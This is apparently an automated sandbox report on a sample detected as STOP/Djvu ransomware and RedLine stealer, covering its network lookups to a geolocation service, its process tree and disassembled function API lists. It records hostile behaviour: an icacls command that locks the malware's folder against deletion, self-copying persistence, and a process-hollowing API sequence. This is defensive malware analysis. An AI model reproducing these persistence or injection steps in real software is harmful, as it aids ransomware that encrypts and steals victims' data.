2024-08-09 08:48:39 UTC	85	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2024-08-09 08:48:40 UTC	893	IN	HTTP/1.1 200 OK Date: Fri, 09 Aug 2024 08:48:40 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close strict-transport-security: max-age=63072000; preload x-frame-options: SAMEORIGIN x-content-type-options: nosniff x-xss-protection: 1; mode=block; report=... access-control-allow-origin: * access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FocYwtGpUaLD%2B%2FNbQ%2BEdpt%2Bdq37MQO50PB5y90yCcnStZ14tapl5NDFS6V8FhujAAjmSCpOg5IECGGMzwmkBCMzCq1btSn12WKut4%2F7wMIHYMPqJwcGx8by3Dgju"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b067d0a3fbf0f95-EWR alt-svc: h3=":443"; ma=86400
2024-08-09 08:48:40 UTC	418	IN	Data Raw: 31 39 62 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 79 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 5c 75 30 34 34 65 2d 5c 75 30 34 31 39 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 61 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 Data Ascii: 19b{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c
2024-08-09 08:48:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49740	188.114.97.3	443	4904	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-09 08:48:44 UTC	85	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2024-08-09 08:48:45 UTC	889	IN	HTTP/1.1 200 OK Date: Fri, 09 Aug 2024 08:48:45 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close strict-transport-security: max-age=63072000; preload x-frame-options: SAMEORIGIN x-content-type-options: nosniff x-xss-protection: 1; mode=block; report=... access-control-allow-origin: * access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Iv%2FA1pAqnLI4UpiY150Ciwa8Sc0CuDyGce2LRBjmFAhiv7E38r%2FjgCSZcciZBXa%2BKmBhLqAZhHOMaNrkfSUEDH9yvhMZyJnZuvZX2decOWkEjAj0d3zl3GtZzWgG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b067d292b3d4291-EWR alt-svc: h3=":443"; ma=86400
2024-08-09 08:48:45 UTC	418	IN	Data Raw: 31 39 62 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 79 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 5c 75 30 34 34 65 2d 5c 75 30 34 31 39 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 61 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 Data Ascii: 19b{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c
2024-08-09 08:48:45 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	04:48:00
Start date:	09/08/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x400000
File size:	746'496 bytes
MD5 hash:	D7528CD33B73718B5949277420681F90
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000000.00000002.1752226229.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000002.1752226229.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1752159390.000000000210D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	04:48:08
Start date:	09/08/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x400000
File size:	746'496 bytes
MD5 hash:	D7528CD33B73718B5949277420681F90
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	04:48:09
Start date:	09/08/2024
Path:	C:\Windows\SysWOW64\icacls.exe
Wow64 process (32bit):	true
Commandline:	icacls "C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Imagebase:	0x450000
File size:	29'696 bytes
MD5 hash:	2E49585E4E08565F52090B144062F97E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	04:48:09
Start date:	09/08/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe" --Admin IsNotAutoStart IsNotTask
Imagebase:	0x400000
File size:	746'496 bytes
MD5 hash:	D7528CD33B73718B5949277420681F90
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000003.00000002.1882592220.0000000002177000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000003.00000002.1883209457.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000003.00000002.1883209457.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	04:48:11
Start date:	09/08/2024
Path:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe --Task
Imagebase:	0x400000
File size:	746'496 bytes
MD5 hash:	D7528CD33B73718B5949277420681F90
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.2105224464.0000000002148000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000004.00000002.2105284111.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000004.00000002.2105284111.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 87%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	04:48:18
Start date:	09/08/2024
Path:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe" --AutoStart
Imagebase:	0x400000
File size:	746'496 bytes
MD5 hash:	D7528CD33B73718B5949277420681F90
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.1978609190.00000000020F6000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000006.00000002.1978697322.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000002.1978697322.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	04:48:21
Start date:	09/08/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe" --Admin IsNotAutoStart IsNotTask
Imagebase:	0x400000
File size:	746'496 bytes
MD5 hash:	D7528CD33B73718B5949277420681F90
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000007.00000002.1892636740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000007.00000002.1892636740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000007.00000002.1892636740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	04:48:26
Start date:	09/08/2024
Path:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe" --AutoStart
Imagebase:	0x400000
File size:	746'496 bytes
MD5 hash:	D7528CD33B73718B5949277420681F90
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000A.00000002.2056830480.00000000020FE000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000A.00000002.2056958884.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000A.00000002.2056958884.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	04:48:30
Start date:	09/08/2024
Path:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe" --AutoStart
Imagebase:	0x400000
File size:	746'496 bytes
MD5 hash:	D7528CD33B73718B5949277420681F90
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000B.00000002.1992636135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000B.00000002.1992636135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000B.00000002.1992636135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	04:48:38
Start date:	09/08/2024
Path:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe" --AutoStart
Imagebase:	0x400000
File size:	746'496 bytes
MD5 hash:	D7528CD33B73718B5949277420681F90
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000C.00000002.2066559473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000C.00000002.2066559473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000C.00000002.2066559473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	04:48:43
Start date:	09/08/2024
Path:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe --Task
Imagebase:	0x400000
File size:	746'496 bytes
MD5 hash:	D7528CD33B73718B5949277420681F90
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000D.00000002.2936387316.0000000000868000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000D.00000002.2936140866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000D.00000002.2936140866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000D.00000002.2936140866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	1.2%
Dynamic/Decrypted Code Coverage:	29.5%
Signature Coverage:	37.2%
Total number of Nodes:	129
Total number of Limit Nodes:	20

Executed Functions

Function 004A7829 Relevance: 72.0, APIs: 35, Strings: 6, Instructions: 231
timelibrarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 004A78A7
DeleteVolumeMountPointW.KERNEL32(00000000), ref: 004A78AE
GetCommandLineA.KERNEL32 ref: 004A78B4
lstrcatW.KERNEL32(?,00000000), ref: 004A78D9
InterlockedExchange.KERNEL32(?,00000000), ref: 004A78E5
SetActiveWindow.USER32(00000000), ref: 004A78EC
TryEnterCriticalSection.KERNEL32(?), ref: 004A78F7
WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 004A790D
CopyRect.USER32(?,?), ref: 004A791D
DebugActiveProcessStop.KERNEL32(00000000), ref: 004A7924
GetAtomNameW.KERNEL32(00000000,00000000,00000000), ref: 004A792D
GlobalDeleteAtom.KERNEL32(00000000), ref: 004A7934
GetTimeZoneInformation.KERNEL32(?), ref: 004A7942
GetComputerNameW.KERNEL32(00000000,00000000), ref: 004A794A
_memset.LIBCMT ref: 004A795C
GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 004A796B
DebugBreak.KERNEL32 ref: 004A7971
EnumDateFormatsA.KERNEL32(00000000,00000000,00000000), ref: 004A797A
LoadLibraryA.KERNEL32(00000000), ref: 004A7990
LoadLibraryA.KERNEL32(emuritowuwep), ref: 004A7997
SetCommMask.KERNELBASE(00000000,00000000), ref: 004A79AB
GetTickCount.KERNEL32 ref: 004A79B1
GetSystemTimes.KERNEL32(?,?,?), ref: 004A79C6
FoldStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 004A79EC
OpenWaitableTimerW.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 004A7A0A
CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 004A7A13
FormatMessageW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004A7A27
__vswprintf.LIBCMT ref: 004A7A3E
_calloc.LIBCMT ref: 004A7A4B
_printf.LIBCMT ref: 004A7A57
_calloc.LIBCMT ref: 004A7A63
_fgetpos.LIBCMT ref: 004A7A6A
_calloc.LIBCMT ref: 004A7A71
LocalAlloc.KERNELBASE(00000000,?,?,?), ref: 004A7A80
LoadLibraryA.KERNELBASE(msimg32.dll), ref: 004A7AC3

Strings

emuritowuwep, xrefs: 004A7992
}$, xrefs: 004A7AE7
msimg32.dll, xrefs: 004A7ABE
VirtualProtect, xrefs: 004A7A38, 004A7A3D, 004A7A56
%s %c, xrefs: 004A7A51
0 %f, xrefs: 004A7A33

Memory Dump Source

Source File: 00000000.00000002.1751755141.0000000000416000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1751728020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751755141.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751850291.00000000004A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751866891.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751889363.00000000004BE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: LibraryLoad_calloc$ActiveAtomCommDebugDeleteNameTimerWaitable$AllocBreakCommandComputerConfigConsoleCopyCountCreateCriticalDateDefaultDriveEnterEnumExchangeFoldFormatFormatsGlobalInformationInterlockedLineLocalLogicalMaskMessageMountOpenPointProcessRectSectionStopStringStringsSystemTickTimeTimesVolumeWindowWriteZone__vswprintf_fgetpos_memset_printflstrcat
String ID: %s %c$0 %f$VirtualProtect$emuritowuwep$msimg32.dll$}$
API String ID: 4223693206-2115628790
Opcode ID: 564bcb48db2b36318d894bddd3ea90382717a3601369224ba8dd1487708703bf
Instruction ID: b8dea9801482fd01cfd1067a498fa11e353114709f9052ddaeecfa012f4ff342
Opcode Fuzzy Hash: 564bcb48db2b36318d894bddd3ea90382717a3601369224ba8dd1487708703bf
Instruction Fuzzy Hash: 5B71AF7140A620ABC331AB61EC499AF3F6CEF6B355B01053FF249D2161DB784546CBAE

Function 021A0110 Relevance: 22.7, APIs: 15, Instructions: 248
memorynativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 021A0156
GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 021A016C
CreateProcessA.KERNELBASE(?,00000000), ref: 021A0255
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 021A0270
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 021A0283
Wow64GetThreadContext.KERNEL32(00000000,?), ref: 021A029F
ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 021A02C8
NtUnmapViewOfSection.NTDLL(00000000,?), ref: 021A02E3
VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 021A0304
NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 021A032A
NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 021A0399
WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 021A03BF
Wow64SetThreadContext.KERNEL32(00000000,?), ref: 021A03E1
ResumeThread.KERNELBASE(00000000), ref: 021A03ED
ExitProcess.KERNEL32(00000000), ref: 021A0412

Memory Dump Source

Source File: 00000000.00000002.1752226229.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21a0000_file.jbxd

Yara matches

Similarity

API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
String ID:
API String ID: 93872480-0
Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
Instruction ID: 1d87489d64599aa1e2c5c946e2bd55bc882d2a87137a0b18cea8062c9c53d729
Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
Instruction Fuzzy Hash: 7CB1C774A00208AFDB44CF98C895F9EBBB5FF88314F248158E909AB391D771AE41CF94

Function 0210D7C6 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0210D7EE
Module32First.KERNEL32(00000000,00000224), ref: 0210D80E

Memory Dump Source

Source File: 00000000.00000002.1752159390.000000000210D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0210D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_210d000_file.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 7e665d7063c512cbb5ae0274c20c4847fa4139fd955cb78f10d1727a32a8c507
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 78F062352407106FD7203BF5B8CDB6E76E8EF49729F100529E642914C0DBB0E8458A65

Function 00401327 Relevance: 21.1, APIs: 14, Instructions: 86
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_fast_error_exit.LIBCMT ref: 00401372
__mtinit.LIBCMT ref: 00401378
_fast_error_exit.LIBCMT ref: 00401383
__RTC_Initialize.LIBCMT ref: 00401389
__ioinit.LIBCMT ref: 00401391
__amsg_exit.LIBCMT ref: 0040139C
GetCommandLineW.KERNEL32 ref: 004013A2
__wsetargv.LIBCMT ref: 004013B6
__amsg_exit.LIBCMT ref: 004013C1
__wsetenvp.LIBCMT ref: 004013C7
__amsg_exit.LIBCMT ref: 004013D2
__cinit.LIBCMT ref: 004013D9
__amsg_exit.LIBCMT ref: 004013E4
__wwincmdln.LIBCMT ref: 004013EA

Memory Dump Source

Source File: 00000000.00000002.1751755141.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1751728020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751755141.0000000000416000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751850291.00000000004A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751866891.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751889363.00000000004BE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: __amsg_exit$_fast_error_exit$CommandInitializeLine__cinit__ioinit__mtinit__wsetargv__wsetenvp__wwincmdln
String ID:
API String ID: 2477803136-0
Opcode ID: 70f8b1119466b1b414ff4d00518d2b9ecb3f839af7780154a84f5fabeea9db00
Instruction ID: 8c17f6059ffbf052f1353c0810e5ff4f3cc530814015d503f08207b996c2b9f8
Opcode Fuzzy Hash: 70f8b1119466b1b414ff4d00518d2b9ecb3f839af7780154a84f5fabeea9db00
Instruction Fuzzy Hash: 0E21C7B0D0034499EB547BB2A946B6E36A8AF8070DF10447FFA05BA5E3EE7C8941875D

Function 021A0420 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 021A0533

Strings

0, xrefs: 021A0492
d, xrefs: 021A0584
saodkfnosa9uin, xrefs: 021A04DA
mfoaskdfnoa, xrefs: 021A0520, 021A0523

Memory Dump Source

Source File: 00000000.00000002.1752226229.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21a0000_file.jbxd

Yara matches

Similarity

API ID: CreateWindow
String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
API String ID: 716092398-2341455598
Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
Instruction ID: b725735002c7845be1bed18fb32927c8243fbbd6bf4e28c427347c2071ccd961
Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
Instruction Fuzzy Hash: 97513870D48388DEEB11CBE8C859BDDBFB2AF15708F144058D5487F286C3BA5658CB62

Function 021A05B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNELBASE(apfHQ), ref: 021A05EC

Strings

o, xrefs: 021A0600
apfHQ, xrefs: 021A05E2, 021A05E5

Memory Dump Source

Source File: 00000000.00000002.1752226229.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21a0000_file.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID: apfHQ$o
API String ID: 3188754299-2999369273
Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
Instruction ID: 4792514202a5a1d8e86b964b1383f2e6e8287125131d16bb7809024c59359fde
Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
Instruction Fuzzy Hash: 9A012174C0425CEEDF14DB98C5283AEBFB5AF45308F1480D9C4192B241D7769B59CBA1

Function 00402596 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 004025AB

Memory Dump Source

Source File: 00000000.00000002.1751755141.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1751728020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751755141.0000000000416000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751850291.00000000004A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751866891.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
